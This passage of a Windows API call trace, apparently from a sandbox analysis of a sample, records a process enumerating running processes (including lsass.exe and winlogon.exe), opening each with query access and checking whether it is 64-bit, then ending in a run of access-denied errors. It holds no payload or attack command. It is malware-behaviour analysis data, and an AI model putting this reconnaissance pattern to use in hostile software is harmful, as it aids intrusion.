	[0071.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0071.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0071.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0071.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0071.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0071.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd20, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0071.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0071.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0071.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0071.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.933] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0071.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0071.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0071.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0071.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0071.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0071.934] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.934] CloseHandle (hObject=0x224) returned 1
	[0071.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0071.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0071.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728a58, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0071.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0071.935] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.935] CloseHandle (hObject=0x224) returned 1
	[0071.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728858, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0071.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0071.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0071.935] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.935] CloseHandle (hObject=0x224) returned 1
	[0071.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0071.935] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.935] CloseHandle (hObject=0x224) returned 1
	[0071.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0071.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.936] CloseHandle (hObject=0x224) returned 1
	[0071.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0071.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.936] CloseHandle (hObject=0x224) returned 1
	[0071.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728a98, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0071.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0071.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.936] CloseHandle (hObject=0x224) returned 1
	[0071.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0071.936] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.936] CloseHandle (hObject=0x224) returned 1
	[0071.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0071.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0071.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.937] CloseHandle (hObject=0x224) returned 1
	[0071.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0071.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.937] CloseHandle (hObject=0x224) returned 1
	[0071.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0071.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.937] CloseHandle (hObject=0x224) returned 1
	[0071.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0071.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0071.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0071.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.938] CloseHandle (hObject=0x224) returned 1
	[0071.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7289f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0071.938] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.938] CloseHandle (hObject=0x224) returned 1
	[0071.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc80, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0071.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0071.938] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.938] CloseHandle (hObject=0x224) returned 1
	[0071.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728998, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0071.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0071.938] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.938] CloseHandle (hObject=0x224) returned 1
	[0071.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e888, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0071.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0071.939] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.939] CloseHandle (hObject=0x224) returned 1
	[0071.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0071.939] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.939] CloseHandle (hObject=0x224) returned 1
	[0071.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0071.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0071.939] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.939] CloseHandle (hObject=0x224) returned 1
	[0071.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0071.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0071.939] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.939] CloseHandle (hObject=0x224) returned 1
	[0071.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0071.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0071.940] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.940] CloseHandle (hObject=0x224) returned 1
	[0071.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0071.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0071.940] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.940] CloseHandle (hObject=0x224) returned 1
	[0071.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0071.940] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.940] CloseHandle (hObject=0x224) returned 1
	[0071.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0071.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0071.940] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.940] CloseHandle (hObject=0x224) returned 1
	[0071.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e888, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0071.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0071.940] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.940] CloseHandle (hObject=0x224) returned 1
	[0071.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0071.941] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.941] CloseHandle (hObject=0x224) returned 1
	[0071.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772170, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0071.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0071.941] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.941] CloseHandle (hObject=0x224) returned 1
	[0071.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728998, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0071.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0071.941] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.941] CloseHandle (hObject=0x224) returned 1
	[0071.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0071.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0071.941] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.941] CloseHandle (hObject=0x224) returned 1
	[0071.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728858, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0071.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0071.942] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.942] CloseHandle (hObject=0x224) returned 1
	[0071.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0071.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0071.942] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.942] CloseHandle (hObject=0x224) returned 1
	[0071.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72eb30, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0071.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0071.942] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0071.942] CloseHandle (hObject=0x224) returned 1
	[0071.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0071.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0071.942] GetLastError () returned 0x5
	[0071.942] GetLastError () returned 0x5
	[0071.942] GetLastError () returned 0x5
	[0071.942] GetLastError () returned 0x5
	[0071.942] GetLastError () returned 0x5
	[0071.942] GetLastError () returned 0x5
	[0071.942] GetLastError () returned 0x5
	[0071.942] GetLastError () returned 0x5
	[0071.942] GetLastError () returned 0x5
	[0071.942] GetLastError () returned 0x5
	[0071.942] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
	[0071.943] GetLastError () returned 0x5
